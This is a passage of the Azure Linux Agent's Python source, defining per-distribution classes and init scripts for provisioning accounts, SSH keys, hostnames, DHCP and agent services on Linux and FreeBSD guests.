If the distro has set dhcp_enabled to True, it will need to provide an implementation of this method. """ raise NotImplementedError('startDHCP method missing') def translateCustomData(self, data): """ Translate the custom data from a Base64 encoding. Default to no-op. """ decodeCustomData = Config.get("Provisioning.DecodeCustomData") if decodeCustomData != None and decodeCustomData.lower().startswith("y"): return base64.b64decode(data) return data def getConfigurationPath(self): return "/etc/waagent.conf" def getProcessorCores(self): return int(RunGetOutput("grep 'processor.*:' /proc/cpuinfo |wc -l")[1]) def getTotalMemory(self): return int(RunGetOutput("grep MemTotal /proc/meminfo |awk '{print $2}'")[1]) / 1024 def getInterfaceNameByMac(self, mac): ret, output = RunGetOutput("ifconfig -a") if ret != 0: raise Exception("Failed to get network interface info") output = output.replace('\n', '') match = re.search(r"(eth\d).*(HWaddr|ether) {0}".format(mac), output, re.IGNORECASE) if match is None: raise Exception("Failed to get ifname with mac: {0}".format(mac)) output = match.group(0) eths = re.findall(r"eth\d", output) if eths is None or len(eths) == 0: raise Exception("Failed to get ifname with mac: {0}".format(mac)) return eths[-1] def configIpV4(self, ifName, addr, netmask=24): ret, output = RunGetOutput("ifconfig {0} up".format(ifName)) if ret != 0: raise Exception("Failed to bring up {0}: {1}".format(ifName, output)) ret, output = RunGetOutput("ifconfig {0} {1}/{2}".format(ifName, addr, netmask)) if ret != 0: raise Exception("Failed to config ipv4 for {0}: {1}".format(ifName, output)) def setDefaultGateway(self, gateway): Run("/sbin/route add default gw" + gateway, chk_err=False) def routeAdd(self, net, mask, gateway): Run("/sbin/route add -net " + net + " netmask " + mask + " gw " + gateway, chk_err=False) ############################################################ # GentooDistro ############################################################ gentoo_init_file = """\ #!/sbin/runscript command=/usr/sbin/waagent pidfile=/var/run/waagent.pid command_args=-daemon command_background=true name="Azure Linux Agent" depend() { need localmount use logger network after bootmisc modules } """ class gentooDistro(AbstractDistro): """ Gentoo distro concrete class """ def __init__(self): # super(gentooDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_name = 'sshd' self.hostname_file_path = '/etc/conf.d/hostname' self.dhcp_client_name = 'dhcpcd' self.shadow_file_mode = 0o640 self.init_file = gentoo_init_file def publishHostname(self, name): try: if (os.path.isfile(self.hostname_file_path)): r = ReplaceFileContentsAtomic(self.hostname_file_path, "hostname=\"" + name + "\"\n" + "\n".join(filter(lambda a: not a.startswith("hostname="), GetFileContents(self.hostname_file_path).split("\n")))) except: return 1 return r def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o755) def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('rc-update add ' + self.agent_service_name + ' default') def uninstallAgentService(self): return Run('rc-update del ' + self.agent_service_name + ' default') def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def checkPackageInstalled(self, p): if Run('eix -I ^' + p + '$', chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run('eix -u ^' + p + '$', chk_err=False): return 0 else: return 1 
def RestartInterface(self, iface): Run("/etc/init.d/net." + iface + " restart") ############################################################ # SuSEDistro ############################################################ suse_init_file = """\ #! /bin/sh # # Azure Linux Agent sysV init script # # Copyright 2013 Microsoft Corporation # Copyright SUSE LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # /etc/init.d/waagent # # and symbolic link # # /usr/sbin/rcwaagent # # System startup script for the waagent # ### BEGIN INIT INFO # Provides: AzureLinuxAgent # Required-Start: $network sshd # Required-Stop: $network sshd # Default-Start: 3 5 # Default-Stop: 0 1 2 6 # Description: Start the AzureLinuxAgent ### END INIT INFO PYTHON=/usr/bin/python WAZD_BIN=/usr/sbin/waagent WAZD_CONF=/etc/waagent.conf WAZD_PIDFILE=/var/run/waagent.pid test -x "$WAZD_BIN" || { echo "$WAZD_BIN not installed"; exit 5; } test -e "$WAZD_CONF" || { echo "$WAZD_CONF not found"; exit 6; } . /etc/rc.status # First reset status of this service rc_reset # Return values acc. to LSB for all commands but status: # 0 - success # 1 - misc error # 2 - invalid or excess args # 3 - unimplemented feature (e.g. reload) # 4 - insufficient privilege # 5 - program not installed # 6 - program not configured # # Note that starting an already running service, stopping # or restarting a not-running service as well as the restart # with force-reload (in case signalling is not supported) are # considered a success. case "$1" in start) echo -n "Starting AzureLinuxAgent" ## Start daemon with startproc(8). If this fails ## the echo return value is set appropriate. startproc -f ${PYTHON} ${WAZD_BIN} -daemon rc_status -v ;; stop) echo -n "Shutting down AzureLinuxAgent" ## Stop daemon with killproc(8) and if this fails ## set echo the echo return value. killproc -p ${WAZD_PIDFILE} ${PYTHON} ${WAZD_BIN} rc_status -v ;; try-restart) ## Stop the service and if this succeeds (i.e. the ## service was running before), start it again. $0 status >/dev/null && $0 restart rc_status ;; restart) ## Stop the service and regardless of whether it was ## running or not, start it again. $0 stop sleep 1 $0 start rc_status ;; force-reload|reload) rc_status ;; status) echo -n "Checking for service AzureLinuxAgent " ## Check status with checkproc(8), if process is running ## checkproc will return with exit status 0. checkproc -p ${WAZD_PIDFILE} ${PYTHON} ${WAZD_BIN} rc_status -v ;; probe) ;; *) echo "Usage: $0 {start|stop|status|try-restart|restart|force-reload|reload}" exit 1 ;; esac rc_exit """ class SuSEDistro(AbstractDistro): """ SuSE Distro concrete class Put SuSE specific behavior here... 
""" def __init__(self): super(SuSEDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_name = 'sshd' self.kernel_boot_options_file = '/boot/grub/menu.lst' self.hostname_file_path = '/etc/HOSTNAME' self.requiredDeps += ["/sbin/insserv"] self.init_file = suse_init_file self.dhcp_client_name = 'dhcpcd' if ((DistInfo(fullname=1)[0] == 'SUSE Linux Enterprise Server' and DistInfo()[1] >= '12') or \ (DistInfo(fullname=1)[0] == 'openSUSE' and DistInfo()[1] >= '13.2')): self.dhcp_client_name = 'wickedd-dhcp4' self.grubKernelBootOptionsFile = '/boot/grub/menu.lst' self.grubKernelBootOptionsLine = 'kernel' self.getpidcmd = 'pidof ' self.dhcp_enabled = True def checkPackageInstalled(self, p): if Run("rpm -q " + p, chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run("zypper list-updates | grep " + p, chk_err=False): return 1 else: return 0 def installAgentServiceScriptFiles(self): try: SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) except: pass def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('insserv ' + self.agent_service_name) def uninstallAgentService(self): return Run('insserv -r ' + self.agent_service_name) def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def startDHCP(self): Run("service " + self.dhcp_client_name + " start", chk_err=False) def stopDHCP(self): Run("service " + self.dhcp_client_name + " stop", chk_err=False) ############################################################ # redhatDistro ############################################################ redhat_init_file = """\ #!/bin/bash # # Init file for AzureLinuxAgent. # # chkconfig: 2345 60 80 # description: AzureLinuxAgent # # source function library . /etc/rc.d/init.d/functions RETVAL=0 FriendlyName="AzureLinuxAgent" WAZD_BIN=/usr/sbin/waagent start() { echo -n $"Starting $FriendlyName: " $WAZD_BIN -daemon & } stop() { echo -n $"Stopping $FriendlyName: " killproc -p /var/run/waagent.pid $WAZD_BIN RETVAL=$? echo return $RETVAL } case "$1" in start) start ;; stop) stop ;; restart) stop start ;; reload) ;; report) ;; status) status $WAZD_BIN RETVAL=$? ;; *) echo $"Usage: $0 {start|stop|restart|status}" RETVAL=1 esac exit $RETVAL """ class redhatDistro(AbstractDistro): """ Redhat Distro concrete class Put Redhat specific behavior here... 
""" def __init__(self): super(redhatDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_restart_option = 'condrestart' self.ssh_service_name = 'sshd' self.hostname_file_path = None if DistInfo()[1] < '7.0' else '/etc/hostname' self.init_file = redhat_init_file self.grubKernelBootOptionsFile = '/boot/grub/menu.lst' self.grubKernelBootOptionsLine = 'kernel' def publishHostname(self, name): super(redhatDistro, self).publishHostname(name) if DistInfo()[1] < '7.0': filepath = "/etc/sysconfig/network" if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("HOSTNAME"), GetFileContents(filepath).split('\n')))) ethernetInterface = MyDistro.GetInterfaceName() filepath = "/etc/sysconfig/network-scripts/ifcfg-" + ethernetInterface if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "DHCP_HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("DHCP_HOSTNAME"), GetFileContents(filepath).split('\n')))) return 0 def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) return 0 def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('chkconfig --add waagent') def uninstallAgentService(self): return Run('chkconfig --del ' + self.agent_service_name) def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def checkPackageInstalled(self, p): if Run("yum list installed " + p, chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run("yum check-update | grep " + p, chk_err=False): return 1 else: return 0 def checkDependencies(self): """ Generic dependency check. Return 1 unless all dependencies are satisfied. """ if DistInfo()[1] < '7.0' and self.checkPackageInstalled('NetworkManager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 try: m = __import__('pyasn1') except ImportError: Error(GuestAgentLongName + " requires python-pyasn1 for your Linux distribution.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 ############################################################ # centosDistro ############################################################ class centosDistro(redhatDistro): """ CentOS Distro concrete class Put CentOS specific behavior here... """ def __init__(self): super(centosDistro, self).__init__() ############################################################ # eulerosDistro ############################################################ class eulerosDistro(redhatDistro): """ EulerOS Distro concrete class Put EulerOS specific behavior here... """ def __init__(self): super(eulerosDistro, self).__init__() ############################################################ # oracleDistro ############################################################ class oracleDistro(redhatDistro): """ Oracle Distro concrete class Put Oracle specific behavior here... """ def __init__(self): super(oracleDistro, self).__init__() ############################################################ # asianuxDistro ############################################################ class asianuxDistro(redhatDistro): """ Asianux Distro concrete class Put Asianux specific behavior here... 
""" def __init__(self): super(asianuxDistro, self).__init__() ############################################################ # CoreOSDistro ############################################################ class CoreOSDistro(AbstractDistro): """ CoreOS Distro concrete class Put CoreOS specific behavior here... """ CORE_UID = 500 def __init__(self): super(CoreOSDistro, self).__init__() self.requiredDeps += ["/usr/bin/systemctl"] self.agent_service_name = 'waagent' self.init_script_file = '/etc/systemd/system/waagent.service' self.fileBlackList.append("/etc/machine-id") self.dhcp_client_name = 'systemd-networkd' self.getpidcmd = 'pidof ' self.shadow_file_mode = 0o640 self.waagent_path = '/usr/share/oem/bin' self.python_path = '/usr/share/oem/python/bin' self.dhcp_enabled = True if 'PATH' in os.environ: os.environ['PATH'] = "{0}:{1}".format(os.environ['PATH'], self.python_path) else: os.environ['PATH'] = self.python_path if 'PYTHONPATH' in os.environ: os.environ['PYTHONPATH'] = "{0}:{1}".format(os.environ['PYTHONPATH'], self.waagent_path) else: os.environ['PYTHONPATH'] = self.waagent_path def checkPackageInstalled(self, p): """ There is no package manager in CoreOS. Return 1 since it must be preinstalled. """ return 1 def checkDependencies(self): for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def checkPackageUpdateable(self, p): """ There is no package manager in CoreOS. Return 0 since it can't be updated via package. """ return 0 def startAgentService(self): return Run('systemctl start ' + self.agent_service_name) def stopAgentService(self): return Run('systemctl stop ' + self.agent_service_name) def restartSshService(self): """ SSH is socket activated on CoreOS. No need to restart it. """ return 0 def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 def RestartInterface(self, iface): Run("systemctl restart systemd-networkd") def CreateAccount(self, user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin and userentry[2] != self.CORE_UID: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "useradd --create-home --password '*' " + user if expiration != None: command += " --expiredate " + expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: self.changePass(user, password) try: if password == None: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod("/etc/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." 
home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def startDHCP(self): Run("systemctl start " + self.dhcp_client_name, chk_err=False) def stopDHCP(self): Run("systemctl stop " + self.dhcp_client_name, chk_err=False) def translateCustomData(self, data): return base64.b64decode(data) def getConfigurationPath(self): return "/usr/share/oem/waagent.conf" ############################################################ # debianDistro ############################################################ debian_init_file = """\ #!/bin/sh ### BEGIN INIT INFO # Provides: AzureLinuxAgent # Required-Start: $network $syslog # Required-Stop: $network $syslog # Should-Start: $network $syslog # Should-Stop: $network $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: AzureLinuxAgent # Description: AzureLinuxAgent ### END INIT INFO . /lib/lsb/init-functions OPTIONS="-daemon" WAZD_BIN=/usr/sbin/waagent WAZD_PID=/var/run/waagent.pid case "$1" in start) log_begin_msg "Starting AzureLinuxAgent..." pid=$( pidofproc $WAZD_BIN ) if [ -n "$pid" ] ; then log_begin_msg "Already running." log_end_msg 0 exit 0 fi start-stop-daemon --start --quiet --oknodo --background --exec $WAZD_BIN -- $OPTIONS log_end_msg $? ;; stop) log_begin_msg "Stopping AzureLinuxAgent..." start-stop-daemon --stop --quiet --oknodo --pidfile $WAZD_PID ret=$? rm -f $WAZD_PID log_end_msg $ret ;; force-reload) $0 restart ;; restart) $0 stop $0 start ;; status) status_of_proc $WAZD_BIN && exit 0 || exit $? ;; *) log_success_msg "Usage: /etc/init.d/waagent {start|stop|force-reload|restart|status}" exit 1 ;; esac exit 0 """ class debianDistro(AbstractDistro): """ debian Distro concrete class Put debian specific behavior here... """ def __init__(self): super(debianDistro, self).__init__() self.requiredDeps += ["/usr/sbin/update-rc.d"] self.init_file = debian_init_file self.agent_package_name = 'walinuxagent' self.dhcp_client_name = 'dhclient' self.getpidcmd = 'pidof ' self.shadow_file_mode = 0o640 def checkPackageInstalled(self, p): """ Check that the package is installed. Return 1 if installed, 0 if not installed. This method of using dpkg-query allows wildcards to be present in the package name. """ if not Run("dpkg-query -W -f='${Status}\n' '" + p + "' | grep ' installed' 2>&1", chk_err=False): return 1 else: return 0 def checkDependencies(self): """ Debian dependency check. python-pyasn1 is NOT needed. Return 1 unless all dependencies are satisfied. NOTE: using network*manager will catch either package name in Ubuntu or debian. """ if self.checkPackageInstalled('network*manager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def checkPackageUpdateable(self, p): if Run("apt-get update ; apt-get upgrade -us | grep " + p, chk_err=False): return 1 else: return 0 def installAgentServiceScriptFiles(self): """ If we are packaged - the service name is walinuxagent, do nothing. 
""" if self.agent_service_name == 'walinuxagent': return 0 try: SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) except OSError as e: ErrorWithPrefix('installAgentServiceScriptFiles', 'Exception: ' + str(e) + ' occured creating ' + self.init_script_file) return 1 return 0 def registerAgentService(self): if self.installAgentServiceScriptFiles() == 0: return Run('update-rc.d waagent defaults') else: return 1 def uninstallAgentService(self): return Run('update-rc.d -f ' + self.agent_service_name + ' remove') def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 ############################################################ # KaliDistro - WIP # Functioning on Kali 1.1.0a so far ############################################################ class KaliDistro(debianDistro): """ Kali Distro concrete class Put Kali specific behavior here... """ def __init__(self): super(KaliDistro, self).__init__() ############################################################ # UbuntuDistro ############################################################ ubuntu_upstart_file = """\ #walinuxagent - start Azure agent description "walinuxagent" author "Ben Howard <ben.howard@canonical.com>" start on (filesystem and started rsyslog) pre-start script WALINUXAGENT_ENABLED=1 [ -r /etc/default/walinuxagent ] && . /etc/default/walinuxagent if [ "$WALINUXAGENT_ENABLED" != "1" ]; then exit 1 fi if [ ! -x /usr/sbin/waagent ]; then exit 1 fi #Load the udf module modprobe -b udf end script exec /usr/sbin/waagent -daemon """ class UbuntuDistro(debianDistro): """ Ubuntu Distro concrete class Put Ubuntu specific behavior here... """ def __init__(self): super(UbuntuDistro, self).__init__() self.init_script_file = '/etc/init/waagent.conf' self.init_file = ubuntu_upstart_file self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log"] self.dhcp_client_name = None self.getpidcmd = 'pidof ' def registerAgentService(self): return self.installAgentServiceScriptFiles() def uninstallAgentService(self): """ If we are packaged - the service name is walinuxagent, do nothing. """ if self.agent_service_name == 'walinuxagent': return 0 os.remove('/etc/init/' + self.agent_service_name + '.conf') def unregisterAgentService(self): """ If we are packaged - the service name is walinuxagent, do nothing. """ if self.agent_service_name == 'walinuxagent': return self.stopAgentService() return self.uninstallAgentService() def deprovisionWarnUser(self): """ Ubuntu specific warning string from Deprovision. """ print("WARNING! Nameserver configuration in /etc/resolvconf/resolv.conf.d/{tail,original} will be deleted.") def deprovisionDeleteFiles(self): """ Ubuntu uses resolv.conf by default, so removing /etc/resolv.conf will break resolvconf. Therefore, we check to see if resolvconf is in use, and if so, we remove the resolvconf artifacts. """ if os.path.realpath('/etc/resolv.conf') != '/run/resolvconf/resolv.conf': Log("resolvconf is not configured. 
Removing /etc/resolv.conf") self.fileBlackList.append('/etc/resolv.conf') else: Log("resolvconf is enabled; leaving /etc/resolv.conf intact") resolvConfD = '/etc/resolvconf/resolv.conf.d/' self.fileBlackList.extend([resolvConfD + 'tail', resolvConfD + 'original']) for f in os.listdir(LibDir) + self.fileBlackList: try: os.remove(f) except: pass return 0 def getDhcpClientName(self): if self.dhcp_client_name != None: return self.dhcp_client_name if DistInfo()[1] == '12.04': self.dhcp_client_name = 'dhclient3' else: self.dhcp_client_name = 'dhclient' return self.dhcp_client_name def waitForSshHostKey(self, path): """ Wait until the ssh host key is generated by cloud init. """ for retry in range(0, 10): if (os.path.isfile(path)): return True time.sleep(1) Error("Can't find host key: {0}".format(path)) return False ############################################################ # LinuxMintDistro ############################################################ class LinuxMintDistro(UbuntuDistro): """ LinuxMint Distro concrete class Put LinuxMint specific behavior here... """ def __init__(self): super(LinuxMintDistro, self).__init__() ############################################################ # fedoraDistro ############################################################ fedora_systemd_service = """\ [Unit] Description=Azure Linux Agent After=network.target After=sshd.service ConditionFileIsExecutable=/usr/sbin/waagent ConditionPathExists=/etc/waagent.conf [Service] Type=simple ExecStart=/usr/sbin/waagent -daemon [Install] WantedBy=multi-user.target """ class fedoraDistro(redhatDistro): """ FedoraDistro concrete class Put Fedora specific behavior here... """ def __init__(self): super(fedoraDistro, self).__init__() self.service_cmd = '/usr/bin/systemctl' self.hostname_file_path = '/etc/hostname' self.init_script_file = '/usr/lib/systemd/system/' + self.agent_service_name + '.service' self.init_file = fedora_systemd_service self.grubKernelBootOptionsFile = '/etc/default/grub' self.grubKernelBootOptionsLine = 'GRUB_CMDLINE_LINUX=' def publishHostname(self, name): SetFileContents(self.hostname_file_path, name + '\n') ethernetInterface = MyDistro.GetInterfaceName() filepath = "/etc/sysconfig/network-scripts/ifcfg-" + ethernetInterface if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "DHCP_HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("DHCP_HOSTNAME"), GetFileContents(filepath).split('\n')))) return 0 def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o644) return Run(self.service_cmd + ' daemon-reload') def registerAgentService(self): self.installAgentServiceScriptFiles() return Run(self.service_cmd + ' enable ' + self.agent_service_name) def uninstallAgentService(self): """ Call service subsystem to remove waagent script. 
""" return Run(self.service_cmd + ' disable ' + self.agent_service_name) def unregisterAgentService(self): """ Calls self.stopAgentService and call self.uninstallAgentService() """ self.stopAgentService() self.uninstallAgentService() def startAgentService(self): """ Service call to start the Agent service """ return Run(self.service_cmd + ' start ' + self.agent_service_name) def stopAgentService(self): """ Service call to stop the Agent service """ return Run(self.service_cmd + ' stop ' + self.agent_service_name, False) def restartSshService(self): """ Service call to re(start) the SSH service """ sshRestartCmd = self.service_cmd + " " + self.ssh_service_restart_option + " " + self.ssh_service_name retcode = Run(sshRestartCmd) if retcode > 0: Error("Failed to restart SSH service with return code:" + str(retcode)) return retcode def deleteRootPassword(self): return Run("/sbin/usermod root -p '!!'") def packagedInstall(self, buildroot): """ Called from setup.py for use by RPM. Copies generated files waagent.conf, under the buildroot. """ if not os.path.exists(buildroot + '/etc'): os.mkdir(buildroot + '/etc') SetFileContents(buildroot + '/etc/waagent.conf', MyDistro.waagent_conf_file) if not os.path.exists(buildroot + '/etc/logrotate.d'): os.mkdir(buildroot + '/etc/logrotate.d') SetFileContents(buildroot + '/etc/logrotate.d/WALinuxAgent', WaagentLogrotate) self.init_script_file = buildroot + self.init_script_file # this allows us to call installAgentServiceScriptFiles() if not os.path.exists(os.path.dirname(self.init_script_file)): os.mkdir(os.path.dirname(self.init_script_file)) self.installAgentServiceScriptFiles() def CreateAccount(self, user, password, expiration, thumbprint): super(fedoraDistro, self).CreateAccount(user, password, expiration, thumbprint) Run('/sbin/usermod ' + user + ' -G wheel') def DeleteAccount(self, user): Run('/sbin/usermod ' + user + ' -G ""') super(fedoraDistro, self).DeleteAccount(user) ############################################################ # FreeBSD ############################################################ FreeBSDWaagentConf = """\ # # Azure Linux Agent Configuration # Role.StateConsumer=None # Specified program is invoked with the argument "Ready" when we report ready status # to the endpoint server. Role.ConfigurationConsumer=None # Specified program is invoked with XML file argument specifying role configuration. Role.TopologyConsumer=None # Specified program is invoked with XML file argument specifying role topology. Provisioning.Enabled=y # Provisioning.DeleteRootPassword=y # Password authentication for root account will be unavailable. Provisioning.RegenerateSshHostKeyPair=y # Generate fresh host key pair. Provisioning.SshHostKeyPairType=rsa # Supported values are "rsa", "dsa" and "ecdsa". Provisioning.MonitorHostName=y # Monitor host name changes and publish changes via DHCP requests. ResourceDisk.Format=y # Format if unformatted. If 'n', resource disk will not be mounted. ResourceDisk.Filesystem=ufs2 # ResourceDisk.MountPoint=/mnt/resource # ResourceDisk.EnableSwap=n # Create and use swapfile on resource disk. ResourceDisk.SwapSizeMB=0 # Size of the swapfile. LBProbeResponder=y # Respond to load balancer probes if requested by Azure. Logs.Verbose=n # Enable verbose logs OS.RootDeviceScsiTimeout=300 # Root device timeout in seconds. OS.OpensslPath=None # If "None", the system default version is used. """ bsd_init_file = """\ #! /bin/sh # PROVIDE: waagent # REQUIRE: DAEMON cleanvar sshd # BEFORE: LOGIN # KEYWORD: nojail . 
/etc/rc.subr export PATH=$PATH:/usr/local/bin name="waagent" rcvar="waagent_enable" command="/usr/sbin/${name}" command_interpreter="/usr/local/bin/python" waagent_flags=" daemon &" pidfile="/var/run/waagent.pid" load_rc_config $name run_rc_command "$1" """ bsd_activate_resource_disk_txt = """\ #!/usr/bin/env python import os import sys import imp # waagent has no '.py' therefore create waagent module import manually. __name__='setupmain' #prevent waagent.__main__ from executing waagent=imp.load_source('waagent','/tmp/waagent') waagent.LoggerInit('/var/log/waagent.log','/dev/console') from waagent import RunGetOutput,Run Config=waagent.ConfigurationProvider(None) format = Config.get("ResourceDisk.Format") if format == None or format.lower().startswith("n"): sys.exit(0) device_base = 'da1' device = "/dev/" + device_base for entry in RunGetOutput("mount")[1].split(): if entry.startswith(device + "s1"): waagent.Log("ActivateResourceDisk: " + device + "s1 is already mounted.") sys.exit(0) mountpoint = Config.get("ResourceDisk.MountPoint") if mountpoint == None: mountpoint = "/mnt/resource" waagent.CreateDir(mountpoint, "root", 0755) fs = Config.get("ResourceDisk.Filesystem") if waagent.FreeBSDDistro().mediaHasFilesystem(device) == False : Run("newfs " + device + "s1") if Run("mount " + device + "s1 " + mountpoint): waagent.Error("ActivateResourceDisk: Failed to mount resource disk (" + device + "s1).") sys.exit(0) waagent.Log("Resource disk (" + device + "s1) is mounted at " + mountpoint + " with fstype " + fs) waagent.SetFileContents(os.path.join(mountpoint,waagent.README_FILENAME), waagent.README_FILECONTENT) swap = Config.get("ResourceDisk.EnableSwap") if swap == None or swap.lower().startswith("n"): sys.exit(0) sizeKB = int(Config.get("ResourceDisk.SwapSizeMB")) * 1024 if os.path.isfile(mountpoint + "/swapfile") and os.path.getsize(mountpoint + "/swapfile") != (sizeKB * 1024): os.remove(mountpoint + "/swapfile") if not os.path.isfile(mountpoint + "/swapfile"): Run("umask 0077 && dd if=/dev/zero of=" + mountpoint + "/swapfile bs=1024 count=" + str(sizeKB)) if Run("mdconfig -a -t vnode -f " + mountpoint + "/swapfile -u 0"): waagent.Error("ActivateResourceDisk: Configuring swap - Failed to create md0") if not Run("swapon /dev/md0"): waagent.Log("Enabled " + str(sizeKB) + " KB of swap at " + mountpoint + "/swapfile") else: waagent.Error("ActivateResourceDisk: Failed to activate swap at " + mountpoint + "/swapfile") """ class FreeBSDDistro(AbstractDistro): """ """ def __init__(self): """ Generic Attributes go here. These are based on 'majority rules'. This __init__() may be called or overriden by the child. 
""" super(FreeBSDDistro, self).__init__() self.agent_service_name = os.path.basename(sys.argv[0]) self.selinux = False self.ssh_service_name = 'sshd' self.ssh_config_file = '/etc/ssh/sshd_config' self.hostname_file_path = '/etc/hostname' self.dhcp_client_name = 'dhclient' self.requiredDeps = ['route', 'shutdown', 'ssh-keygen', 'pw' , 'openssl', 'fdisk', 'sed', 'grep', 'sudo'] self.init_script_file = '/etc/rc.d/waagent' self.init_file = bsd_init_file self.agent_package_name = 'WALinuxAgent' self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log", '/etc/resolv.conf'] self.agent_files_to_uninstall = ["/etc/waagent.conf"] self.grubKernelBootOptionsFile = '/boot/loader.conf' self.grubKernelBootOptionsLine = '' self.getpidcmd = 'pgrep -n' self.mount_dvd_cmd = 'dd bs=2048 count=33 skip=295 if=' # custom data max len is 64k self.sudoers_dir_base = '/usr/local/etc' self.waagent_conf_file = FreeBSDWaagentConf def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o777) AppendFileContents("/etc/rc.conf", "waagent_enable='YES'\n") return 0 def registerAgentService(self): self.installAgentServiceScriptFiles() return Run("services_mkdb " + self.init_script_file) def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 def deleteRootPassword(self): """ BSD root password removal. """ filepath = "/etc/master.passwd" ReplaceStringInFile(filepath, r'root:.*?:', 'root::') # ReplaceFileContentsAtomic(filepath,"root:*LOCK*:14600::::::\n" # + "\n".join(filter(lambda a: not a.startswith("root:"),GetFileContents(filepath).split('\n')))) os.chmod(filepath, self.shadow_file_mode) if self.isSelinuxSystem(): self.setSelinuxContext(filepath, 'system_u:object_r:shadow_t:s0') RunGetOutput("pwd_mkdb -u root /etc/master.passwd") Log("Root password deleted.") return 0 def changePass(self, user, password): return RunSendStdin("pw usermod " + user + " -h 0 ", password, log_cmd=False) def load_ata_piix(self): return 0 def unload_ata_piix(self): return 0 def checkDependencies(self): """ FreeBSD dependency check. Return 1 unless all dependencies are satisfied. """ for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def packagedInstall(self, buildroot): pass def GetInterfaceName(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() return iface def RestartInterface(self, iface): Run("service netif restart") def GetIpv4Address(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() return inet def GetMacAddress(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() l = mac.split(':') r = [] for i in l: r.append(string.atoi(i, 16)) return r def GetFreeBSDEthernetInfo(self): """ There is no SIOCGIFCONF on freeBSD - just parse ifconfig. Returns strings: iface, inet4_addr, and mac or 'None,None,None' if unable to parse. We will sleep and retry as the network must be up. 
